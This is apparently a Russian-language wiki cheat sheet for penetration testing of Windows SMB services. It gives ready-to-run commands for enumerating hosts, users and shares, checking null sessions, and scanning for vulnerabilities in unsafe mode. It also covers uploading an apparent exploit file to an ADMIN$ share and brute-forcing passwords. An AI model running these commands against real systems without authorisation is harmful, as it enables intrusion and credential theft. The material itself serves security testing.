Smb all

Материал из InformationSecurity WIKI
Перейти к: навигация, поиск

Описание

Разведка

Все вместе

enum4linux

  1. enum4linux -a [-u USERNAME] [-w WORKGROUP] [-p PASSWORD] ip

nullinux

  1. nullinux [-u 'Domain\User'] [-w WORKGROUP] [-P password] ip

Поиск сервисов

nmap

  1. nmap _ips_ -p 139,445 -v --script=smb-enum*


nbtscan

Доменные имена, мак-адреса.

  1. nbtscan 192.168.1.0/24

Сбор информации

nmblookup

Входит в enum4linux

  1. nmblookup -A target

smb_version

Определяем версию

  1. msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
  2. msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
  3. RHOSTS => 192.168.31.142
  4. msf auxiliary(scanner/smb/smb_version) > run

Поиск пользователей

smb_lookupsid

  1. msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid
  2. msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
  3. RHOSTS => 192.168.31.142
  4. msf auxiliary(scanner/smb/smb_lookupsid) > run

nmap

  1. nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

impacket-samrdump

  1. python /usr/share/doc/python-impacket-doc/examples
  2. /samrdump.py 192.168.XXX.XXX
  3.  
  4. impacket-samrdump 192.168.XXX.XXX

Список сетевых хранилищ

smbmap

  1. smbmap -H target

smbclient

  1. echo exit | smbclient -L \\\\target

nmap

  1. nmap --script smb-enum-shares -p 139,445 target

Тестирование

Проверка на доступ с пустой сессией

smbmap

  1. smbmap -H target


rpcclient

  1. rpcclient -U "" -N target

smbclient

  1. smbclient \\\\target\\share_name
  2.  
  3. smbclient -L //target

Windows CMD

  1. net use \\TARGET\IPC$ "" /u:""

Поиск уязвимостей

nmap

  1. nmap --script smb-vuln* -p 139,445 target --script-args=unsafe=1


Перебор RID (юзеры)

ridenum

  1. ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

smb_lookupsid

use auxiliary/scanner/smb/smb_lookupsid </syntaxhighlight>


Работа с файлами

smbclient

Загрузка файла

  1. smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"

Примонтировать директорию

  1. smbclient -L \\WIN7\ -I 192.168.13.218
  2. smbclient -L \\WIN7\ADMIN$  -I 192.168.13.218
  3. smbclient -L \\WIN7\C$ -I 192.168.13.218
  4. smbclient -L \\WIN7\IPC$ -I 192.168.13.218
  5. smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB

mount

  1. mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP

Windows CMD

  1. net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES

smbspider

Утверждают что одна из лучших тулз для работы в виндовыми сетевыми хранилищами.

  1. smbspider [-h] -ip IPADDRESS -s SHARE [-f SUBFOLDER] [-pa PATTERN]
  2.                  [-pf PATTERNFILE] [-u USER] [-p PWD] [-d DOMAIN]
  3.                  [-r RECURSIVE] [-t THREADS]

Атака

Перебор паролей

smb_login

  1. use auxiliary/scanner/smb/smb_login

smbrute.py

https://github.com/m4ll0k/SMBrute

  1. python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10

Ссылки

cheatsheet pentest